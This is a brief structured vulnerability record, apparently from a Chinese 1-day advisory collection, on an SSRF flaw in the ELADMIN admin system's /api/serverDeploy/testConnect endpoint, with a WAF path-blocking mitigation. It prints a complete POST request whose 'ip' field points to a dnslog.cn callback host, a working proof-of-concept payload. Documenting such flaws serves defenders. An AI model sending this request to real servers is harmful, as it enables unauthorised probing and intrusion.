vendor = "ELADMIN"
name = "ELADMIN后台管理系统存在SSRF漏洞"
type = "SSRF"
version = "未知"
path = "/api/serverDeploy/testConnect"
detail = "POST /api/serverDeploy/testConnect HTTP/2 Host:192.168.0.1 {\"id\":9,\"name\":\"53\",\"ip\":\"xxx.dnslog.cn\",\"account\":\"root\",\"password\":\"1321\",\"createBy\":\"admin\",\"creatTime\":\"2024-08-06 00:00:00\",\"updateBy\":\"admin\",\"updateTime\":\"2024-08-06 00:00:00\"}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0812"
label = "1day"
